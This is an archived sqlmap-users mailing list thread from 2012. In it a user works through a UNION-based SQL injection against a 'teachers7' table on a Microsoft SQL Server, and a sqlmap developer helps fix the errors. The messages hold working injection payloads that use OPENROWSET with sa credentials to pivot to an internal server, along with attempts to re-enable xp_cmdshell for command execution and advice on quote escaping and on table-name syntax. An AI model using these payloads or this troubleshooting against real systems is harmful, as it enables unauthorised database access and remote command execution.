Re: [sqlmap-users] error with ms sql
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] error with ms sql
|
From: Miroslav S. <mir...@gm...> - 2012-06-21 12:19:21
|
Hi Adi. I think that that is really the proper way how to "escape" the single quote in MsSQL ( http://stackoverflow.com/questions/1586560/how-do-i-escape-a-single-quote-in-sqlserver) and you can't use any CHAR() escaping directly inside the OPENROWSET (there are some ways how to do it via EXEC http://social.msdn.microsoft.com/forums/en-US/transactsql/thread/0f78e033-53a4-4404-a190-9e3b269874ec<- you can use there a CHAR() escaping, but I really do believe that this is unnecessary in your case). So, I would suggest you to continue playing around a bit (e.g. with other extended stored procedures ( http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm) to see if the problem persists). Kind regards, Miroslav Stampar On Thu, Jun 21, 2012 at 1:12 PM, Adi Mutu <adi...@ya...> wrote: > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',' > select @@version; master..sp_configure ''xp_cmdshell'',1 > ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808 > > the problem is with the query: > > select @@version; master..sp_configure ''xp_cmdshell'',1 > Any possibility to give the string from ascii codes as in mysql? > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 2:01 PM > *Subject:* Re: [sqlmap-users] error with ms sql > > It all depends on context. You'll need to send a sample that you want to > run. Quotes are not interpreted/parsed everywhere the same. > > Kind regards > > On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote: > > my feeling is that > "[OLE/DB provider returned message: Deferred prepare could not be > completed." is because of an sql error:) so my fault. > > and regarding the second error, I think you must always return some > columns in the query , such as select @@version. > > now question is how do i embed a string inside another string delimited > with quotes? Looks like double quotes is not working.....doubling quote '' > looks like not working always.... > > ------------------------------ > *From:* Adi Mutu <adi...@ya...> > *To:* Miroslav Stampar <mir...@gm...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:45 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > tried, same stuff. > I've tried to reenable xp_cmdshell first with > > master..sp_configure 'show advanced options',1 > reconfigure > master..sp_configure 'xp_cmdshell',1 > reconfigure > > and got the same error: [OLE/DB provider returned message: Deferred > prepare could not be completed.] > > then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" ' > and got error: > > OLE DB error trace [Non-interface error: OLE DB provider unable to process > object, since the object has no columnsProviderName='SQLOLEDB', Query=exec > sp_addextendedproc "xp_cmdshell","xp_log70.dll" ']. > > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:26 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > try with master..resultabcd > > i forgot to mention that there needs to be two dots (or schema name in > between) between db name and table name in mssql > > On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote: > > Hi Miroslav, > > got db_name master and tried with master.resultabcd but i get the same > error. > > Kind Regards, > A. > > ------------------------------ > *From:* Miroslav Stampar <mir...@gm...> > *To:* Adi Mutu <adi...@ya...> > *Cc:* "sql...@li..." < > sql...@li...> > *Sent:* Thursday, June 21, 2012 11:11 AM > *Subject:* Re: [sqlmap-users] error with ms sql > > Hi Adi. > > You could try prepending the database name to the resultbcd. It seems that > in case of linked server(s) doing that fixes the mentioned problem > (Reference: > http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466 > ) > > Kind regards, > Miroslav Stampar > > On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote: > > I'm having an injection like this: > openrowset in a union (I've managed to do a SELECT @@version on > 192.168.1.4) > > -1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( > select * from > OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select > output from resultbcd')),'aaa','15','16','17','18','19','20','21' from > teachers7 where id=808 > > and when I try to select form resultabcd i get: > [OLE/DB provider returned message: Deferred prepare could not be > completed.] > > could not find a good answer with google. Thanks. > > Kind regards, > A. > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > ------------------------------------------------------------------------------ > Live Security Virtual Conference > Exclusive live event will cover all the ways today's security and > threat landscape has changed and how IT managers can respond. Discussions > will include endpoint security, mobile security and the latest in malware > threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/ > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > -- Miroslav Stampar http://about.me/stamparm |
